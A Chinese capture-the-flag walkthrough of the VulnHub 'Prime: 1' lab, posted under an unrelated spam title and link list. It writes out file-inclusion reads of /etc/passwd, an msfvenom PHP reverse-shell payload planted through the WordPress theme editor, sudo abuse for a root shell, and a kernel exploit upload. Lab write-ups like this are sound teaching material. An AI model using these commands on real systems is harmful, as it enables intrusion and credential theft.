当前位置: 首页 > news >正文

网站开发公司交易流程代理网络下载

网站开发公司交易流程,代理网络下载,怎么做合买彩票网站,加利弗设计公司目录 环境安装 1.信息收集 收集IP 端口扫描 目录扫描 目录文件扫描 查找参数 打Boss 远程文件读取 木马文件写入 权限提升 方法一 解锁密钥 方法二#xff1a; linux内核漏洞提权 总结 环境安装 Kali2021.4及其prime靶机 靶机安装#xff1a;Prime: 1 ~ Vul…目录 环境安装 1.信息收集 收集IP 端口扫描 目录扫描 目录文件扫描 查找参数 打Boss 远程文件读取 木马文件写入 权限提升 方法一 解锁密钥 方法二 linux内核漏洞提权 总结 环境安装 Kali2021.4及其prime靶机 靶机安装Prime: 1 ~ VulnHub 解压后点击下面选中文件选择虚拟机打开即可 然后修改一下设置采用NAT模式就行nat可以通过主机与外部网络连接且有独立ip 打开虚拟机即可 1.信息收集 收集IP arp-scan -l 通过http://ip的形式访问确定了靶机IP为192.168.232.128 端口扫描 nmap ip 开启了22端口ssh服务、80端口http。 目录扫描 dirb http://192.168.232.128 访问/dev发现提示应该深度挖掘 目录文件扫描 dirb http://192.168.232.128 -X .txt,.php,.html,.zip 哦secret.txt快快快 提示我们fuzz一下然后就是github那个网址还有查看location.txt发现直接访问/location.txt并不行那先放一放看看github网站 具体如下 COMMAND wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZsomething 查找参数 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://192.168.232.128/index.php?FUZZlocation.txt 一大堆是line7应该都不是我们所需要的随便试一个也没有回显现在我们可以添加命令--h; 7 过滤line7 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 --hl 7 http://192.168.232.128/index.php?FUZZlocation.txt 发现file参数此时猜测可能与文件包含有关快快快传入filelocation.txt试试成功 打Boss 远程文件读取 再看看/etc/passwd看看看来只限于读取location.txt文件 根据上述location的提示出现下一个参数secrettier360试试看 空空如也 不过之前还扫出个image.php吗再在传参试试 成功并且可以远程读文件读个/etc/passwd试试发现关键现在再看看/home/saket/password.txt读取到密码follow_the_ippsec。 猜测可能是ssh的密码试试看 看来是不对了。 回看之前web目录扫描的时候看到下列信息 访问看看发现要登录 但是没有Username不过我们不难看出该网站是用wordpress搭建的于是我们就是用专用于改模块的工具看看用户 wpscan --url http://192.168.232.128/wordpress -e 确定了用户名victor 登录看看成功登录 木马文件写入 一个一个看最后发现Appearance-Theme Editor-secret.php这个文件可以更改内容那就插入木马文件吧 kali可以使用msf来生成后木马文件(ip要改为kali的ip)其实传入一句话木马也行然后蚁剑连接但是后续我没有试过了 msfvenom -p php/meterpreter/reverse_tcp LHOST192.168.232.152 LPORT7777 -o mshell.php启动msf msfconsole //启动 use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 192.168.232.152 set lport 7777 run 此时就说明连接成功了 但是还要执行一个shell指令才能执行命令行如下 权限提升 方法一 解锁密钥 先 whoami  查看用户 www-data比一般的用户权限还要低。 看看我们能执行的 sudo -l sudo -l 是一个在Unix/Linux系统包括Kali Linux中用于查询当前用户所拥有的sudo权限的命令。当你执行 sudo -l 时系统会列出你作为当前用户可以执行哪些命令以及使用sudo时无需再次输入密码的命令配置。 访问/home/saket/enc权限不够那我们看看别的 cat enc也行不通但是由上图发现enc有执行权限不管什么先执行看看 要输入密码试试之前那个如上没有任何回显说明密码不对但是一般而言对于密码系统都会有备份文件试着找一下 find / -name *backup* 2/dev/null | less| sortfind /在根目录寻找包含backup字符串的文件 2/dev/null: /dev/null 是一个特殊的文件它的作用是丢弃所有写入它的数据。即将错误输出重定向到 /dev/null 就相当于丢弃所有错误信息(例如权限不足)只保留正常输出 | less 把前的指令内容用less指令执行 | sort 把输出内容以以首字母排序 找到可疑文件查看试试 拿到可疑密码backup_password 密码正确权限不够但是此时好像跟enc.txtkey.txt有关那就看看 顺便看一下又得知enc是一种openssl加密方式、key即为密钥 openssl解密 命令 echo {要解密的字符串} | openssl enc -d -a -{解密算法} -K {key值}{key}必须为十六进制编码 md5加密 echo -n ippsec | md5sum 转为十六进制 echo -n 366a74cb3c959de17d61db30591c39d1 | od -An -t x1 |tr -d |tr -d \n| od -An -t x1管道 (|) 将 echo 输出的内容传递给 odoctal dump命令。-An 参数表示不打印地址-t x1 表示以十六进制形式输出每个字节。 | tr -d trtranslate命令用于删除指定字符这里的 -d 表示删除所有空格。 | tr -d \n再次使用 tr 命令删除所有的换行符\n。然后把openssl的解密方法下载至CryptType文中 红线以下的内容全部保存在CryptType文件中 然后使用批解密的方式进行解密 for i in $(cat CryptType);do echo nzEiKr82Kh8BOQg0k/LViTZJup9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKIdB3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkbbFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm/aWWVMxDOwKuqIT1ZZ0Nw4 | openssl enc -d -a -$i -K 3336366137346362336339353964653137643631646233303539316333396431 2/dev/null; echo $i;doneaes-256-cbc解密成功 根据提示有可能是ssh的端口的密码。 ssh saketip 成功连接现在至升到了一般用户接下来提权到root 继续看看可执行的命令sudo -l 提示到/home/victor/undefeated_victor所以sudo /home/victor/undefeated_victor 然后我们可以执行一个python命令来优化命令执行 python -c import pty;pty.spawn(/bin/bash) 使得$变为了saketubuntu方便我们更好查看所属目录 再根据上上图片的提示发现没有找到/tmp/challenge应该是要我们自己创建 几乎要先cd /tmp 到该目录下 写入内容 #!/bin/bash /bin/bash 在上述命令中sudo 会让用户临时以root权限执行 /bin/bash前提是你有足够的权限即已授权sudo且知道sudo密码。 成功写入但后附与该文件执行权限 chmod x challenge 再次执行 sudo /home/victor/undefeated_victor 即可拿到root命令行 读取flag即可 下面展示未使用优化命令行由于已经生成了challenge文件就不比在演示了 方法二 linux内核漏洞提权 此时还是在msf中的 查看内核版本 hostnamectl 或者 uname -a 再创建一个msf的窗口查找内核漏洞 找到后使用下述命令把它copy到家目录(~)下 cp /usr/share/exploitdb/exploits/linux/local/45010.c ~用gcc编译它并保存为yf文件(随便取) gcc 45010.c -o yf 然后使用msf的upload指令把该文件放在靶机中 upload ~/yf /tmp/45010 然后shell使用终端查看后对该45010文件赋予(x)执行权限。最后 ./45010 执行该文件即可 此处没有成功的原因是kali的版本过高了没有成功。 一般执行之后应该是下图 然后就是到root目录下拿取root.txt就可以了。 总结 大致熟悉了渗透的过程了解了msf的使用以及Linux内核提权解密钥等的方法。
http://www.dnsts.com.cn/news/209762.html

相关文章:

  • 水滴保险官方网站自己的网站如何做推广
  • 国内阿里网站建设公司制作网站价格
  • 营销型网站建设课程培训现场建网站的公司大全
  • 国内高端大气的网站设计太原做网站多少钱
  • 做网站优化如何遍文章软件工程师中级职称
  • 简述网站的建设方案查流量网站
  • 如何提升网站转化率免费网站营销计划
  • 品牌网站制作报价表wordpress图标不显示
  • 泰兴市住房和建设局网站wordpress自己发文章
  • 甘肃网站建设哪家好百度移动排名优化软件
  • seo整站优化解决方案网站源代码程序
  • 网站建设包含那些 内容关键词智能优化排名
  • 网站建设管理规范外贸搜索推广
  • 百度双站和响应式网站的区别ps免费素材网站有哪些
  • 南京网站关键词推广网站建设具体项目及价格
  • html 门户网站模板石家庄seo排名公司
  • 网站建设要不要工商注册网站导航html源码
  • 自己做网站卖东西可以做爰 网站
  • 个人主页网站制作教程网站模板使用
  • 福田区住房和建设局网站论坛网站开发中遇到的问题
  • saas建站工具网站提供什么服务
  • 有没有免费做企业网站的建设网站得目的
  • 企业网站做的好的有什么公司美耐皿 技术支持 东莞网站建设
  • 广州做网站如何装修设计网站源码
  • 做设计用哪个素材网站微商代理网
  • 淘宝网站内站建设网站建设技术代码
  • 瑞安做网站html模板素材
  • 建分类信息网站有哪些做的好的网站
  • 花溪区生态文明建设局网站重庆天蚕网络科技有限公司
  • 成都网站建设公司哪家好城乡建设和住房建设厅官网